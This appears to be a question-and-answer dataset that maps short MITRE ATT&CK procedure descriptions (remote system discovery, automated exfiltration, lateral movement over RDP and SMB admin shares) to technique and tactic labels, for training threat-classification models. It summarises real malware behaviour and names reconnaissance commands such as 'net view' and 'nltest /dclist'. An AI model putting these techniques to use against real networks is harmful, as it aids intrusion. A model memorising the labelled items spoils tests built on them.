+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can collect information about hosts on the victim network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can find machines on the local network by gathering known local IP addresses through `DNSGetCacheDataTable`, `GetIpNetTable`,`WNetOpenEnumW(RESOURCE_GLOBALNET, RESOURCETYPE_ANY)`,`NetServerEnum`,`GetTcpTable`, and `GetAdaptersAddresses.`","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer can enumerate remote computers in the compromised network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has used a script to parse files like /etc/hosts and SSH known_hosts to discover remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of available servers with the command net view.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP has the capability to identify remote hosts on connected networks.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NBTscan can list NetBIOS computer names.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Commands such as net view can be used in Net to gather information about available remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nltest may be used to enumerate remote domain controllers using options such as /dclist and /dsgetdc.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo performs a connection test to discover remote systems in the network,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer uses Windows Management Instrumentation to enumerate all systems in the network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ping can be used to identify remote systems within a network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT used Nmap for remote system discovery.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can identify remote systems through the net view command.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA runs the net view /domain and net view commands.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROADTools can enumerate Azure AD systems and devices.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can ping or traceroute a remote host.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can enumerate and collect the properties of domain computers.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon scans the C-class subnet of the IPs on the victim's interfaces.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments.","Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot may use net view /domain to display hostnames of available systems on a network.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The TAINTEDSCRIBE command and execution module can perform target system enumeration.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can enumerate computers and network devices.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can use net view to gather information about remote systems.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry scans its local network segment for remote systems to try to exploit and copy itself to.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can identify remote hosts on connected networks.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty uses the net view command for discovery.,"Tecnique: T1018 Remote System Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.","Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used modules that automatically upload gathered documents to the C2 server.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has performed frequent and scheduled data exfiltration from compromised networks.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has configured tools to automatically send collected files to attacker controlled servers.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke exfiltrates collected files automatically over FTP to remote servers.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch has automatically exfiltrated stolen files to Dropbox.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury can automatically exfiltrate gathered SSH credentials.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has the ability to automatically send collected data back to the threat actors' C2.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron can be configured to automatically exfiltrate files under a specified directory.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete’s collected files are exfiltrated automatically to remote servers.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel can automatically upload collected files to its C2 server.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peppy has the ability to automatically exfiltrate files and keylogs.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter sent collected system and network information compiled into a report to an adversary-controlled C2.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can automatically exfiltrate collected documents to the C2 server.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When a document is found matching one of the extensions in the configuration, TINYTYPHON uploads it to the C2 server.","Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer automatically exfiltrates collected files via removable media when an infected device connects to an air-gapped victim machine after initially being connected to an internet-enabled victim machine.,"Tecnique: T1020 Automated Exfiltration, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used the WebDAV protocol to execute Ryuk payloads hosted on network file shares.,"Tecnique: T1021 Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has the ability to use RPC for lateral movement.,"Tecnique: T1021 Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kivars has the ability to remotely trigger keyboard input and mouse clicks.,"Tecnique: T1021 Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can manage remote screen sessions.,"Tecnique: T1021 Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet can propagate via peer-to-peer communication and updates using RPC.,"Tecnique: T1021 Remote Services, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used RDP to access specific network hosts of interest.","Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892.","Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles utilized RDP throughout an operation.","Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used RDP with compromised credentials for lateral movement.","Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used RDP sessions from public-facing systems to internal servers.","Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The APT1 group is known to have used RDP during operations.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 enables the Remote Desktop Protocol for persistence. APT3 has also interacted with compromised systems to browse and copy files through RDP sessions.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has been seen using RDP for lateral movement and persistence, in some cases employing the rdpwinst tool for mangement of multiple sessions.","Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used RDP for lateral movement.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has moved laterally throughout victim environments using RDP.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used RDP during operations.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used RDP to access targeted systems.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used Remote Desktop Protocol to conduct lateral movement.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has moved laterally via RDP.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has used RDP to move laterally to systems in the victim environment.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has remotely accessed compromised environments via Remote Desktop Services (RDS) for lateral movement.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 used RDP to move laterally in victim networks.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used RDP to move laterally in victim environments.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used RDP for lateral movement.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used RDP to log in and move laterally in the target environment.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used remote desktop sessions for lateral movement.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used RDP for direct remote point-and-click access.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware SierraCharlie uses RDP for propagation.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has targeted RDP credentials and used it to move through the victim environment.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used Remote Desktop Services to copy tools on targeted systems.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork attempted to use RDP to move laterally.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used RDP for lateral movement.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used RDP for lateral movement and to deploy ransomware interactively.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used RDP connections to move across the victim network.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak enables concurrent Remote Desktop Protocol (RDP) sessions.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can open an active screen of the victim’s machine and take control of the mouse and keyboard.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a module for performing remote desktop access.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can enable remote desktop on the victim's machine.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has laterally moved using RDP connections.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT has a module for performing remote desktop access.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT has a plugin to perform RDP access.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to use RDP to connect to victim's machines.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has the ability to control an infected PC using RDP.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has remote desktop functionality.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can support RDP control.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has a module for performing remote desktop access.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell has used RDP for lateral movement.,"Tecnique: T1021.001 Remote Services: Remote Desktop Protocol, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team utilized `net use` to connect to network shares.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors moved laterally using compromised credentials to connect to internal Windows systems with SMB.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used Impacket's smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used administrative accounts to connect over SMB to targeted users.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has mapped network drives using Net and administrator credentials.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used Net to use Windows' hidden network shares to copy their tools to remote machines for execution.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used SMB for lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has transferred implant files using Windows Admin Shares.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used Windows admin shares to move laterally.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used SMBexec for lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda uses net.exe to connect to network shares using net use commands with compromised credentials.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has leveraged SMB to move laterally within a compromised network via application servers and SQL servers.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has attempted to map to C$ on enumerated hosts to test the scope of their current credentials/context. FIN8 has also used smbexec from the Impacket suite for lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used valid accounts to access SMB shares.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang actors have been known to copy files to the network shares of other computers to move laterally.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has used batch scripts that can enable SMB on a compromised host.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orangeworm has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has copied payloads to the `ADMIN$` share of remote systems and run net use to connect to network shares.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-1314 actors mapped network drives using net use.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used locally mounted network shares for lateral movement through targated environments.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla used net use commands to connect to lateral systems within a network.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can support windows execution via SMB shares.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has run a plug-in on a victim to spread through the local network by using PsExec and accessing admin shares.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has the ability to use SMB to pivot in compromised networks.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use Window admin shares (C$ and ADMIN$) for lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker variants spread through NetBIOS share propagation.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can spread throughout a network via SMB prior to encryption.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has leveraged the Admin$, C$, and IPC$ shares for lateral movement.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs copies itself over network shares to move laterally on a victim network.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can infect victims by brute forcing SMB.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
